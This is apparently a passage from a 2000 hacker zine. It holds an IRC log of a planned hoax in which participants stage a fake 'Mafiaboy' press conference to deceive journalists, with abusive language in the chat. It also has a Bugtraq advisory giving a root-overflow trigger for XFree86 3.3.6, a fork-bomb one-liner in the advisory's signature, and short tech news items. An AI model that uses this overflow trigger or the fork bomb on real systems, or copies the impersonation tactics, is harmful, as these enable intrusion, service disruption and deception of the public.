[16:28] <MrEreet> if Nikitaal really is government then its blown
[16:28] <MrEreet> [16:03] <Nikkitaal> btw: talking with me is like talking directly to goverment ;-)
[16:28] <MrEreet> [16:03] * Nikkitaal *waves* on cybercops watching him
[16:28] <Amoeba> yeah, he said it's a hoax
[16:28] <MrEreet> hes in my channel
[16:28] <YPiLS> -> [msg(Nikkitaal)] hey
[16:28] <YPiLS> -> [msg(Nikkitaal)] cybercop, suck my dick.
[16:28] <YPiLS> heh
[16:28] <YPiLS> man
[16:28] <MrEreet> he knew details on {}'s bust
[16:28] <YPiLS> cyber cops can't do shit
[16:28] <MrEreet> and {} left
[16:28] <YPiLS> well they can but oh well who cares
[16:29] <MrEreet> also think those splits were accidental?
[16:29] <MrEreet> they just installed sniffers
[16:29] <YPiLS> heheheheheheeh
[16:29] <MrEreet> no shit
[16:29] <Amoeba> {} and him talked like they knew each other
[16:29] <MrEreet> they did
[16:29] <MrEreet> hes a fed agent
[16:30] <Amoeba> {} said something about that guy being on his box and {} had to help him
[16:30] <YPiLS> guys
[16:30] <YPiLS> we aren't doing anything illegal
[16:30] <YPiLS> chill
[16:30] <MrEreet> I know
[16:30] <MrEreet> hehe
[16:30] <YPiLS> long as no one starts packetting cnn.com heh we're fine
[16:30] <YPiLS> just don't worry
[16:31] <Amoeba> isn't it a federal offense to run a hoax on the media, or something like that
[16:31] <YPiLS> no
[16:31] <YPiLS> not likely
[16:31] <YPiLS> its not like we're phonin 911
[16:31] <YPiLS> with fake shit
[16:32] <Amoeba> yeah, and I have nothing to do with this
[16:32] <YPiLS> heh man
[16:32] <YPiLS> yer parnoid
[16:32] <YPiLS> i been raided and told to not even talk to my irc friends
[16:32] <YPiLS> i laughed
[16:32] <YPiLS> heh
[16:33] <Amoeba> well I can't get in trouble with the law
[16:33] <Amoeba> it would ruin my SAT scores
[16:33] <YPiLS> neither can i
[16:33] <YPiLS> if i was worried about this shit
[16:33] <YPiLS> i wouldn't do it
[16:33] <YPiLS> if i get caught doin anything illegal with computers i go straight to jail
[16:34] <YPiLS> <YPiLS> hello
[16:34] <YPiLS> <typo_> im from tivision (www.tiv.at), austrian tv channel
[16:34] <YPiLS> here we go.
[16:34] <Amoeba> lol
[16:34] <MrEreet> k so maybe he's just a pretend fed
[16:34] <MrEreet> hahaha
[16:34] <MrEreet> don't know don't care
[16:35] <Amoeba> I'm starving
[16:35] <YPiLS> <typo_> we are nonprofit.. so what are you doing here?
[16:35] <YPiLS> <YPiLS> gonna write yer name down on paper to make sure you get yer chance tommorow night to speak to him.
[16:35] <YPiLS> <typo_> (need more info, maybe we can get it into our IT section on tuesday)
[16:35] <YPiLS> <typo_> yeah.. but what exactly will happen? just questions for mafiaboy ?
[16:35] <YPiLS> <YPiLS> well mafiaboy feels its important that the world knows what he did, he isn't really a bad person like the media is saying, they are saying he's a evil hacker and everything, when really
[16:36] <YPiLS> <typo_> ok cool
[16:36] <YPiLS> <YPiLS> he just feels its important to get the facts straight
[16:36] <YPiLS> heh
[16:36] <YPiLS> this is gonna be funny
[16:36] <YPiLS> <typo_> i'll call the guy that is responsible for TIV IT
[16:36] <Amoeba> lol
[16:36] *** fraggy (fraggy@*.home.com) has joined #media-admin
[16:38] *** fraggy has quit IRC (la de da)
[16:39] <Amoeba> Slipy, I got 2 mails from you at the same time
[16:39] <YPiLS> heh
[16:39] <Amoeba> Should I send it to people?
[16:40] <Amoeba> Because you may have already done that
[16:40] <Amoeba> Alot of places will just get it from wired news
[16:40] <Amoeba> and wired news gets it from the people themselves
[16:48] *** k-rad-bob has quit IRC (Ping timeout)
[16:50] <YPiLS> yeah
[16:50] <YPiLS> go for it
[16:50] <YPiLS> spread the word
[16:50] <YPiLS> just be professional
[16:50] <YPiLS> no
[16:51] <YPiLS> heh mafiaboy be online tonite
[16:51] <YPiLS> leete shit goin on
[16:51] <YPiLS> heh
[16:53] *** Debris has quit IRC (Read error 60: Operation timed out)
[16:54] <Amoeba> Slipy, what if you already mailed a person?
[16:54] <YPiLS> what do u mean?
[16:55] <Amoeba> like if you already contacted a media company
[16:55] <Amoeba> and then I contact them
[16:55] *** Debris (3223@*.net) has joined #media-admin
[16:56] *** MrEreet sets mode: +o Debris
[16:56] *** MrEreet sets mode: +o Amoeba
[16:56] <Amoeba> thank you
[16:56] <MrEreet> aye
[16:56] <Amoeba> what bout #HWA?
[16:57] <YPiLS> oh well
[16:57] <YPiLS> go for it
[16:58] <YPiLS> just keep it real
[16:58] <Amoeba> ok
[16:58] <YPiLS> tell no one even yer friends
[16:58] <YPiLS> its a hoax
[16:58] <Amoeba> I'll send them the mail you sent me
[16:58] <YPiLS> k
[16:58] <YPiLS> sounds good
[16:58] <MrEreet> need more drugs
[16:59] <MrEreet> -m the channel its too quiet
[16:59] <Amoeba> what about mtv?
[16:59] <MrEreet> I see no media
[16:59] <MrEreet> heh
[16:59] <Amoeba> truelife?
[16:59] <YPiLS> channel is +m
[16:59] <MrEreet> k
[16:59] <YPiLS> to keep the hoax quite
[16:59] <YPiLS> just deal wit it
[16:59] <YPiLS> heh
[16:59] <MrEreet> :-))
[16:59] <Amoeba> Cruci, I am getting a cable modem
[16:59] <YPiLS> tommorow nite we get organized better
[16:59] <Amoeba> tomorrow
[16:59] <MrEreet> cool
[16:59] <YPiLS> bbl going out
[16:59] <MrEreet> aight man
[16:59] <YPiLS> keep the media attention up
[16:59] <Amoeba> but it isn't static
[16:59] <YPiLS> but the hoax down.
[16:59] <MrEreet> werd
[17:00] * MrEreet snickers
[17:01] * Amoeba eats a Snickers�
[17:01] <Amoeba> |��8
[17:02] *** debris- (3223@2*.uu.net) has joined #media-admin
[17:02] *** MrEreet sets mode: +o Debris
[17:04] <YPiLS> bbl
[17:04] <debris-> op me in thre other one
[17:04] <debris-> the press release is done
[17:05] <Amoeba> debris, can I see
[17:05] <debris-> im uploading it
[17:05] <debris-> wait
[17:05] <MrEreet> is that you too?
[17:05] <MrEreet> Debris is 3223@*.popsite.net * HEH?
[17:05] <MrEreet> or an imposter
[17:05] <debris-> free isp
[17:05] *** Debris has quit IRC (Read error 54: Connection reset by peer)
[17:06] *** MrEreet sets mode: +o debris-
[17:06] <debris-> dont talk in media-event
[17:07] <debris-> yo
[17:07] <debris-> i think z28 should play mafiaboy
[17:07] <MrEreet> can i chant "hoax" ?
[17:07] <debris-> i think z28 should play mafiaboy
[17:07] <debris-> i think z28 should play mafiaboy
[17:07] <debris-> i think z28 should play mafiaboy
[17:07] <MrEreet> u know
[17:07] <MrEreet> i really don't care
[17:07] <MrEreet> :)
[17:07] <MrEreet> we gonna hold auditions now?
[17:07] <MrEreet> heh
[17:07] <debris-> dude
[17:07] <debris-> trust me
[17:08] <debris-> z28 is the best at this
[17:08] *** debris- changes topic to 'press release www1.thevortex.com'
[17:08] <MrEreet> oh i know I just don't want a fight to fuck it up
[17:08] <MrEreet> ask YPiLS he's mafiaboy
[17:08] <MrEreet> haha
[17:08] <MrEreet> i'm just watching now
[17:08] <MrEreet> already caused enuff shit
[17:09] <debris-> read the press release
[17:10] <MrEreet> heh
[17:10] <MrEreet> don't really want hwa involved
[17:10] <Amoeba> The channel will be moderated thus meaning, now questions will be directly posed to Mafiaboy.
[17:10] <debris-> ok z28 isnt doing it
[17:10] <Amoeba> now should be no
[17:10] <debris-> oh shit
[17:10] <YPiLS> yeah
[17:10] <YPiLS> b4 i go out
[17:10] <YPiLS> any chance
[17:11] <YPiLS> someone on a .montreal isp
[17:11] <YPiLS> could
[17:11] <YPiLS> pose?
[17:11] <YPiLS> debris i'm lookin yer way
[17:11] <YPiLS> ;)
[17:11] <MrEreet> already thought of that but wasn't saying anything
[17:11] <debris-> heh
[17:11] <debris-> we'll see
[17:11] <YPiLS> well i gotta jet
[17:11] <YPiLS> i'll talk more tonite
[17:11] <YPiLS> and try to get a conf up
[17:11] <MrEreet> have fun
[17:11] <YPiLS> with REAL mafiaboy
[17:11] <YPiLS> bbl
[17:11] <MrEreet> think anyone cares?
[17:12] <Amoeba> lol
[17:12] <MrEreet> io think the impending possibility of a retaliatory mass attack was more scary
[17:12] <Amoeba> the rules debris came up with say that any question the press would want to ask is not allowed
[17:12] <Amoeba> those are all the questions they ask
[17:12] <debris-> that makes it more legit
[17:12] <MrEreet> use gov-boi's site instead of hwa in the release
[17:12] <debris-> this isnt a fucking free for all
[17:12] <MrEreet> or something
[17:12] <debris-> we gotta act like were his godamn lawyers
[17:13] <Amoeba> ok
[17:13] <Amoeba> then get rid of the fucking black ass background
[17:13] *** debris- sets mode: -o+b Amoeba *!*GTO@*.l3.net
[17:13] *** Amoeba was kicked by debris- (death to you)
[17:13] <debris-> its not black
[17:13] <MrEreet> haha
[17:13] <YPiLS> don't ban him
[17:13] <YPiLS> he could spill the beans
[17:13] <YPiLS> in media-event
[17:14] <debris-> then ill ban him from media event
[17:14] <debris-> hes gay
[17:14] <debris-> <Amoeba> wtf was that?
[17:14] <debris-> <debris-> its not black
[17:14] <debris-> -Amoeba- Your message has been recorded, away for 10m45s (bored) [email:ntsecurity00@hotmail.com]
[17:14] <debris-> <Amoeba> yes it is
[17:14] <debris-> <debris-> no it isnt
[17:14] <debris-> <debris-> BGCOLOR="#00002b"
[17:14] <debris-> fucking retarded fool
[17:15] <debris-> <Amoeba> get rid of the background tag
[17:15] <debris-> <debris-> well then you must be color blind
[17:15] <debris-> <debris-> no
[17:15] <debris-> <debris-> its fine
[17:15] <debris-> <Amoeba> that might be screwing it up
[17:15] <debris-> <debris-> ive done this before
[17:15] <debris-> <Amoeba> I make webpages for a living
[17:15] <debris-> <Amoeba> and that was no fucking reason to ban me
[17:15] <debris-> <debris-> i create media hoaxes for a living
[17:15] *** debris- sets mode: -b *!*GTO@*.vel3.net
[17:15] *** Amoeba (GTO@dialup.net) has joined #media-admin
[17:15] *** debris- sets mode: +o Amoeba
[17:15] <MrEreet> werd
[17:16] <debris-> i chose that color scheme for a specific reason, to keep it uniform with g0at security and hwa
[17:16] <MrEreet> yeh but remove hwa
[17:16] <debris-> it looks like this is part of an organization now
[17:16] <debris-> remove hwa?
[17:16] <MrEreet> yeh
[17:16] <debris-> <Amoeba> now I am going to curse you, because you severly pissed me off
[17:16] <debris-> <Amoeba> just have to release some aggression
[17:16] <debris-> <Amoeba> you fucking piece of shit
[17:16] <debris-> <Amoeba> what the fuck do you think you're doing?
[17:16] <debris-> <Amoeba> you are the primortial ooze under my shoe
[17:16] *** debris- sets mode: -o+b Amoeba *!*GTO@*.Level3.net
[17:16] *** Amoeba was kicked by debris- (sigh)
[17:17] *** debris- sets mode: -b *!*GTO@*.Level3.net
[17:17] <debris-> you sure you want hwa out of it
[17:17] <MrEreet> yup
[17:17] <debris-> oki
<snip>
[17:47] <SugarKing> www1.thevortex.com
[17:47] <SugarKing> too good:)
<snip>
A website was used to post the details of the 'press release' and
this was posted in the channel topic...
Version #1
05/19/00 - Mafiaboy online press conference
http://www.goat-advisory.org g0at security in conjunction with hwa.hax0r.news
are pleased to announce a Q and A session with alleged hacker, Mafiaboy.
Welcome members of the press and all interested parties. Saturday, May 20 2000,
members of the press and the general public have the oppurtunity to query the
alleged hacker responsible for the attacks on yahoo.com.
The interview will begin promptly at 9:00pm EST on the given date on the Eris
FreeNet's IRC (Internet Relay Chat) network dubbed, EFnet (instructions on
connecting follow).
In order to connect to EFnet, please follow these easy steps
Visit http://www.mirc.com mIRC.com and download the latest version of the mIRC
internet relay chat client. http://home.vpi.net/~hawk/mirc571t.exe
Win95/98/00/NT http://home.vpi.net/~hawk/mirc571s.exe Win3.1/3.11
Upon completion of the download, execute the mIRC self-extracting file and
install it (it is extremely simple, just follow the instructions
Execute the mIRC client. After the splash page, a window should pop up with
empty fields. It is very important that you follow these instructions carefully
or you will not be admitted into the interview. The window you see, will be
labeled 'connect'. Where it is written 'full name', please proceed to input
your full name. In the 'e-mail' field, put you're real e-mail address. Under
'nickname', please put the abreviated name of the agency you represent.
In the 'alternative' field, please enter the same nickname you have entered,
followed by a '-'. Ex) Nickname: BNN | Alternative: BNN-.
Next, making sure the minus sign is visible beside the connect option
(if it is not, double click it), select the ident section (a sub-option of
connect). Select the inable ident server option on the right of your screen.
Under USER ID, enter the full name of the agency you represent. Click the ok
button at the bottom of your screen.
A blank screen should now be in front of you. At the bottom of this screen
there should be a text box. In this box type the following to connect to EFnet.
/server irc.idle.net and click enter. This should connect you to EFnet.
If this does not work, use one of the following alternatives to irc.idle.net:
irc.lsl.com, irc.nethead.com, irc.prison.net, irc.concentric.net, irc.freei.net,
irc.core.com.
A grey window will pop-up once you connect with a list of room names.
At the top, type #media-event and click the join button.
You are now connected.
The interview will engage as follows. The channel will be moderated thus meaning,
now questions will be directly posed to Mafiaboy. At the beginning of the interview,
the nickname of the thirdparty will be divulged. All questions should be asked
towards the third party. In order to do so, double click the third party's nickname
on the right side of the window and enter your question. Questions will be answered
on a first come first serve basis. We ask that you pose one question at a time to
give a chance to others.
The following is not to be asked and doing such will result in immediate expulsion
from the interview: names of accomplices, Mafiaboy's real name, technical questions
concerning the tools used and questions concerning the servers involved in the attacks.
We also ask that you only message the moderator. Messaging any other of the channel
operators including mafiaboy will result in expulsion from the interview. If we find
that you are not following one or more rules including the connecting rules, you will
be expelled.
- g0at security/hwa.hax0r.news
Version #2
05/19/00 - Mafiaboy online press conference
http://www.goat-advisory.org
g0at security is pleased to announce a Q and A session with alleged hacker,
Mafiaboy.
Welcome members of the press and all interested parties. Saturday, May 20
2000, members of the press and the general public have the oppurtunity to
query the alleged hacker responsible for the attacks on yahoo.com.
The interview will begin promptly at 9:00pm EST on the given date on the
Eris FreeNet's IRC (Internet Relay Chat) network dubbed, EFnet
(instructions on connecting follow).
In order to connect to EFnet, please follow these easy steps
Visit http://www.mirc.com mIRC.com and download the latest version of the
mIRC internet relay chat client. http://home.vpi.net/~hawk/mirc571t.exe
Win95/98/00/NT href="http://home.vpi.net/~hawk/mirc571s.exe Win3.1/3.11
Upon completion of the download, execute the mIRC self-extracting file and
install it (it is extremely simple, just follow the instructions
Execute the mIRC client. After the splash page, a window should pop up with
empty fields. It is very important that you follow these instructions
carefully or you will not be admitted into the interview. The window you
see, will be labeled 'connect'. Where it is written 'full name', please
proceed to input your full name. In the 'e-mail' field, put you're real
e-mail address. Under 'nickname', please put the abreviated name of the
agency you represent. In the 'alternative' field, please enter the same
nickname you have entered, followed by a '-'. Ex) Nickname: BNN
| Alternative: BNN-. Next, making sure the minus sign is visible beside
the connect option (if it is not, double click it), select the ident
section (a sub-option of connect). Select the inable ident server option
on the right of your screen. Under USER ID, enter the full name of the
agency you represent. Click the ok button at the bottom of your screen.
A blank screen should now be in front of you. At the bottom of this
screen there should be a text box. In this box type the following to
connect to EFnet. <B>/server irc.idle.net</B> and click enter. This
should connect you to EFnet. If this does not work, use one of the
following alternatives to irc.idle.net: irc.lsl.com, irc.nethead.com,
irc.prison.net, irc.concentric.net, irc.freei.net, irc.core.com.
A grey window will pop-up once you connect with a list of room names.
At the top, type #media-event and click the join button.
You are now connected.
The interview will engage as follows. The channel will be moderated
thus meaning, nowquestions will be directly posed to Mafiaboy. At
the beginning of the interview, the nickname of the thirdparty will
be divulged. All questions should be asked towards the third party.
In order to do so, double click the third party's nickname on the right
side of the window and enter your question. Questions will be answered
on a first come first serve basis. We ask that you pose one question at
a time to give a chance to others.
The following is not to be asked and doing such will result in immediate
expulsion from the interview: names of accomplices, Mafiaboy's real name,
technical questions concerning the tools used and questions concerning
the servers involved in the attacks.
We also ask that you only message the moderator. Messaging any other of
the channel operators including mafiaboy will result in expulsion from
the interview. If we find that you are not following one or more rules
including the connecting rules, you will be expelled.
- g0at security
[17:58] <MrEreet> flow with it
[17:58] <MrEreet> who all was contacted anyway?
[17:58] <MrEreet> the list i posted and who else?
[17:58] <SugarKing> i dunno
[18:00] <MrEreet> hehe
[18:00] <debris-> slipy better get back soon to give the url to the media
[18:01] <MrEreet> he said 30 agencys were notified
[18:01] <MrEreet> what was the reply email though?
[18:01] <MrEreet> we wont see responses until late tonight or tomorrow
[18:01] <debris-> he got one from msnbc and zdnet
[18:02] <MrEreet> and wired?
[18:02] <debris-> dunno
[18:02] <debris-> shit
[18:02] <debris-> we should contact the montrealgazette
[18:02] <MrEreet> i could contact them all again but i don't want to tarnish my rep if it blows up
[18:02] <MrEreet> heh
[18:03] <debris-> because their coverage of mafiaboy gets wired on southempress which owns all the news papers in canada
[18:05] <MrEreet> u know it really is a good opportunity for some underground propaganda and statements clearning up bs like ILOVEYOU virus and DeCSS issues from ppl in the scene
[18:05] <debris-> dude
[18:05] <debris-> keep it simple
[18:05] <MrEreet> well i'm resigned to that now
[18:05] <debris-> just keep it pure mafiaboy and it will make the news
[18:06] <debris-> then we will announce the hoax
[18:06] <MrEreet> yeh
[18:06] <debris-> like the next day
[18:06] <SugarKing> they're gonna be bullshit
[18:06] <SugarKing> heh
[18:06] <MrEreet> needs a twist tho
[18:06] <MrEreet> or at least a good message
[18:06] <debris-> just let them ask their questions, answer them intelligently and etc
[18:06] <MrEreet> not just a hoax for the sake of pulling it off
[18:06] <debris-> ill set up a goat-advisory.org bnc for mafiaboy
[18:06] <MrEreet> nod
[18:08] <MrEreet> biagb
[18:08] <MrEreet> -g
[18:09] <debris-> btw typo_ is media
[18:09] <MrEreet> this fucking sub wrap thing is messy as fuck
[18:09] <MrEreet> oh
[18:09] <MrEreet> shit
[18:09] <debris-> a .at tv show
[18:09] <MrEreet> oh good
[18:09] <MrEreet> not even english
[18:09] <MrEreet> now i'm gay
[18:09] <MrEreet> omg
[18:09] <MrEreet> OMG
[18:09] <MrEreet> rofl
[18:10] <debris-> heg
[18:10] <debris-> heh
[18:10] <MrEreet> [18:09] <p_> yo
[18:10] <MrEreet> [18:10] <p_> is this a hoax or not ?
[18:10] <debris-> ask who he is first
[18:10] *** debris- is now known as Debris
[18:12] <MrEreet> [18:10] <p_> btw I am patrick from security.nl
[18:12] <Debris> wtf is security.nl
[18:12] <MrEreet> [18:12] <p_> whom did you send the press release to ?
[18:13] <MrEreet> crap
[18:13] <SugarKing> security.nl?
[18:13] <Debris> fuck just tell him to message me ill shut him up
[18:14] <MrEreet> told him to msg ya
[18:15] <Debris> he's not messaging me
[18:15] <Debris> i must have started shit with him sometime in the past
[18:18] <MrEreet> guess he doesn't wanna talk to you
[18:18] <MrEreet> hrm
[18:20] <Debris> <p_> no more info needed at this time. tnx
[18:20] <Debris> <Debris> uh...
[18:22] <SugarKing> heh
[18:25] *** YPiLS has quit IRC (Ping timeout: no data for 251 seconds)
[18:26] *** i0 (i0@*.no) has joined #media-admin
[18:32] <i0> Anything new
[18:32] <MrEreet> chatting with the security dude
[18:32] <MrEreet> cool guy
[18:34] <i0> heh
[18:35] <i0> can't wait
[18:35] <twilight-> away back to resident evil (Off/l)(Off/p) (salman@*.com/e) (37543014/uin)
[18:49] * Debris is away, went out [log:OFF] [page:OFF]
[19:02] <SugarKing> [19:07] *** Joins: VetesGirl (Destiny@dyn1-tnt2-206.*.ameritech.net)
[19:02] <SugarKing> heh
[19:02] <SugarKing> hmm
[19:02] <SugarKing> left
[19:02] <MrEreet> some leet types have joined and split
[19:07] <i0> is there any shit in the news yet?
[19:07] <MrEreet> doubt it
[19:07] <MrEreet> real media will try to contact mafiaboy by phone and he will say he knows nothing about it.
[19:08] <MrEreet> thats my guess anyay
[19:08] <MrEreet> it will get mentioned tho
[19:08] <MrEreet> sentence or two somewhere
[19:14] <Amoeba> I just woke up
[19:25] <MrEreet> fucking unreal i can barely stand all this excitement
[19:26] <MrEreet> should I stir things up a bit or leave it alone?
[19:29] <SugarKing> leave it
[19:29] <SugarKing> you don't wanna hype it up that much
[19:37] <twilight-> returned (*yawn*) (1h2m50s)
[19:39] <MrEreet> but
[19:39] <MrEreet> I'm bored
[19:42] <twilight-> how'd you hype it more?
[19:45] <MrEreet> another thing that would generate media interest is to start discussion about it on various web message boards
[19:46] <MrEreet> if public shows interest media will pay more attention
[19:46] <MrEreet> so hit news sites and stuff
[19:48] <twilight-> maybe someone should post it to packetstorm and bugtraq?
[19:48] <twilight-> anti already got mail sent to i think
[19:48] <MrEreet> anyone have slashdot access?
[19:49] <twilight-> i forgot my pw on slash =\
[19:58] <MrEreet> heh
[19:58] <MrEreet> this is funny
[19:58] <twilight-> hrm.. in the ss.. which division do you suppose would handle an event like this?
[19:58] <twilight-> they mailed back?
[19:58] <MrEreet> yep
[19:59] <twilight-> heh, coolter there
[19:59] <twilight-> ah
[19:59] <twilight-> anyone else replied back yet?
[19:59] <MrEreet> no idea my email wasn't used
[19:59] <MrEreet> :(
[20:10] *** sku|| (seksi@dial*.freei.net) has joined #media-admin
[20:10] <sku||> werd
[20:18] <MrEreet> y0
[20:19] <SugarKing> hi
[20:19] <SugarKing> MrEreet: sku||.....is a whore
[20:19] <SugarKing> haha
[20:19] *** SugarKing sets mode: +v sku||
[20:19] <sku||> he knows
[20:23] *** YPiLS has quit IRC (Ping timeout: no data for 247 seconds)
[20:27] <Amoeba> back
[20:34] *** Amoeba has quit IRC (Ping timeout)
[20:36] *** Amoeba (GTO@dialup-*.Level3.net) has joined #media-admin
[20:41] <MrEreet> -=-
[20:41] <MrEreet> 20:33] <xzrg> hope you know.
[20:41] <MrEreet> [20:33] <xzrg> you arent interviewing the 'real' mafiaboy
[20:41] <MrEreet> [20:33] <MrEreet> how do you know this?
[20:41] <MrEreet> [20:33] <xzrg> because i fucking KNOW MAFIABOY.
[20:41] <MrEreet> -
[20:41] <MrEreet> [20:34] <MrEreet> will he talk on phone?
[20:41] <MrEreet> [20:35] <xzrg> you wont get to talk with him AT ALL
[20:41] <MrEreet> [20:35] <MrEreet> fine fuck off then.
[20:41] <MrEreet> -
[20:42] <MrEreet> <MrEreet> don;t need attitude
[20:42] <MrEreet> [20:35] <MrEreet> IGNORED
[20:42] <MrEreet> [20:35] <xzrg> i'm not giving you an attitude
[20:42] <MrEreet> [20:35] <xzrg> i'm just emphasizing those words.
[20:42] <MrEreet> [20:35] <MrEreet> frankly i don't even care
[20:42] <MrEreet> [20:35] <xzrg> i'm just letting you know
[20:42] <MrEreet> [20:35] <MrEreet> thanks
[20:42] <MrEreet> -
[20:42] <MrEreet> 20:36] <xzrg> you wont be getting an interview.
[20:42] <MrEreet> [20:36] <xzrg> well yeah sure you will
[20:42] <MrEreet> [20:36] <xzrg> but it wont be with 'mafiaboy'
[20:42] <MrEreet> [20:36] <MrEreet> believe me I have enough info in my zine already
[20:42] <MrEreet> [20:36] <MrEreet> i could care less personally
[20:42] <MrEreet> [20:36] <MrEreet> he has no skill
[20:42] <MrEreet> [20:36] <xzrg> enough info in your zine?
[20:42] <MrEreet> [20:36] <MrEreet> no concern of mine
[20:42] <MrEreet> -
[20:42] <MrEreet> [20:38] <xzrg> ok.. who is the person incharse?
[20:42] <MrEreet> [20:38] <xzrg> incharge
[20:42] <MrEreet> [20:38] <MrEreet> debris
[20:42] <MrEreet> [20:39] <MrEreet> check the "press release" in the channel topic
[20:43] <MrEreet> -
[20:44] <MrEreet> xzrg is ~regg@*.monmouth.com * americunt hair pie
[20:44] <MrEreet> xzrg on #media-event @#shellz #shells
[20:44] <MrEreet> xzrg using irc.concentric.net Concentric Network Corporation
[20:44] <MrEreet> xzrg has been idle 7 secs, signed on Fri May 19 14:52:11
[20:44] <MrEreet> -
[20:51] <MrEreet> hahaha
[20:51] <MrEreet> guess who that is
[20:52] <Amoeba> who?
[20:52] <MrEreet> it IS mafiaboy's friend
[20:52] <Amoeba> lol
[20:52] <MrEreet> he was dossing as well
[20:52] <MrEreet> but didn't get caught
[20:52] <Amoeba> so, is he gonna keep the secret?
[20:52] <Amoeba> he was?
[20:52] <MrEreet> yeh
[20:52] <MrEreet> ya
[20:52] <Amoeba> what program did they use?
[20:52] <Amoeba> zombies?
[20:52] <MrEreet> tfn
[20:53] <Amoeba> tribal flood network
[20:53] <Amoeba> see, I know the technical terminology and programs
[20:53] <MrEreet> yep
[20:53] <MrEreet> mixter wrote it
[20:53] <Amoeba> yeah
[20:53] <Amoeba> and is the real mixter on?
[20:53] <MrEreet> ya
[20:54] <Amoeba> cool
[20:54] <MrEreet> mixter_ thats him
[20:54] <Amoeba> oh
[20:54] <Amoeba> he's away
[20:54] <Amoeba> tuesday may 16th
[20:54] <MrEreet> #!b0f
[20:55] <MrEreet> http://b0f.freeBSD.lublin.pl/
[20:55] <Amoeba> what is that for?
[20:55] <Amoeba> oh
[20:55] <MrEreet> bbl
[20:56] <Amoeba> ok
[21:24] *** sku|| has quit IRC (irc-w.frontiernet.net irc.Prison.NET)
[21:32] <MrEreet> fucking packet kiddies
[21:32] <MrEreet> lol
[21:53] <Amoeba> ?
[21:58] *** Debris has quit IRC (Read error 54: Connection reset by peer)
[23:00] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98)
[23:02] *** Debris (3223@*.uu.net) has joined #media-admin
[23:02] *** MrEreet sets mode: +o Debris
[23:17] *** Amoeba (GTO@dialup-*.Level3.net) has left #media-admin
[23:22] *** SugarKing has quit IRC (Leaving)
<SNIP>
Later on the press release site this was posted...
-=-
IT'S A HOAX
This has been a g0at security attempt at getting hits to our currently down,
webpage. Although the page is not active at the current instance. Please try
it again sometime in the near future.
And for those stupid people, no mafiaboy is not giving an interview.
END
@HWA
224.0 [IND] XFree86 3.3.6 buffer overflow to root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Buqtraq
XFree86 3.3.6 (and probably 4.0.0 as well ;) - by running X server (no
matter it's setuid, or called from setuid Xwrapper - works in both cases,
seems to me Xwrapper in default RH 6.x distro is rather dumb ;) with
-xkbmap parameter and over 2100 of 'A's (or shellcode, again, it's rather
trivial to exploit :), you'll get beautiful overflow with root privledges
in main (Xserver) process...
listen to the gdb... Cannot access memory at address 0x41414141.
This has been tested both with recent RH6.1/6.2 Xservers (3.3.5/3.3.6),
and:
XFCom_i810 Version 1.0.0 / X Window System
(protocol Version 11, revision 0, vendor release 6300)
Release Date: October 13 1999
Btw. while testing this bug, we have noticed strange behaviour of some
drivers. For example, in one case we get kernel oops, just like that
(linux 2.2.14, XFree86 3.3.6 XF86_S3V):
eip: 41414141 eflags: 00013296
eax: 00000000 ebx: 00000000 ecx: 00000bb8 edx: 00000009
esi: bfffe92c edi: 00000400 ebp: 00000000 esp: bfffe464
Stack: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
:)
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
@HWA
225.0 [MM] Power your PC with a potato!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://news.bbc.co.uk/hi/english/sci/tech/newsid_759000/759529.stm
Potato-powered computer
Chips with everything, even potatoes
By BBC News Online internet reporter Mark
Ward
UK technology enthusiasts have found a way
to power a computer using potatoes.
The computer fans, who run a website called
Temple ov thee Lemur, decided to build the
spud server because someone bet them that it
could not be done.
Although science kits that power a digital clock
off a potato or two are available, few people
have tried anything larger.
Steve Harris, spokesman for the group, said to
lighten the load on the potato power pack the
group had first to make a low power version of
a web server.
Surfers limited
These computers are usually powerful,
high-memory versions of the PCs people have
on their desks. But there was no way a bag of
potatoes would provide enough power for one
of those, said Mr Harris.
For the server the
group cannibalised an
old computer
containing a low-power
Intel 386 chip. They
removed everything
but the central chip
and its associated
circuitry. The place of
the hard disk was
taken by another
custom-built chip that
had the server
software and the two pages of the website
permanently "burned" into it.
Even this small server needs around 12
potatoes to power it and the spuds have to be
changed every couple of days.
Each potato generates about half a volt. The
web pages hosted by the server can be
browsed but the machine limits the number of
people that can view it every minute to ensure
it is not overwhelmed.
Limited hardware
Potatoes can be used as batteries because
the flesh of the vegetable acts as a very thick
electrolyte - like the acid in a car battery.
When electrodes made of zinc and copper are
stuck into the potato the electrochemical
reaction produces a power flow. The salty
flesh of the potato allows ions to cross from
one electrode to another.
Pictures of the potato-powered server are
available but Mr Harris said they were taken
when the system was not switched on. "The
power connectors were plugged in the wrong
way round and it would have been fatal to the
hardware if it had been live," he said.
The spud server is the latest in a series of
attempts by technology fans to get the most
out of very limited hardware.
A Dutch company is making web servers using
old Commodore 64 computers that were
popular in the mid-1980s. Several web servers
are run off old Amiga computers and there is
even a project to turn hand held computers
such as the Palm into low volume web servers.
-=-
Subject: Potatoe run server ;)
Author: BHZ
Date: 05-24-2000 19:12
http://152.78.65.48:2300 is the addy :)
UK technology enthusiasts have found a way to power a computer
using potatoes.
The computer fans, who run a website called Temple ov thee Lemur,
decided to build the spud server because someone bet them that it
could not be done.
Although science kits that power a digital clock off a potato or
two are available, few people have tried anything larger.
Steve Harris, spokesman for the group, said to lighten the load on
the potato power pack the group had first to make a low power
version of a web server.
[http://news.bbc.co.uk/hi/english/sci/tech/newsid_759000/759529.stm]
@HWA
226.0 [MM] Mobile phones fertile for E-bugs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.newscientist.com/news/news_223928.html
Is your phone infected?
Mobiles are fertile ground for e-bugs of the
future
IN THE wake of the Love Bug virus attack, computer scientists
are warning that future viruses aimed at intelligent mobile
phones and personal digital assistants (PDAs) may be even
worse. They could record your conversations and forward
them to others, delete money from "electronic wallets", or
perhaps rack up huge telephone bills. "These viruses could
spread rapidly in future," predicts David Chess, an antivirus
researcher at IBM's T. J. Watson Research Center in Yorktown
Heights, New York.
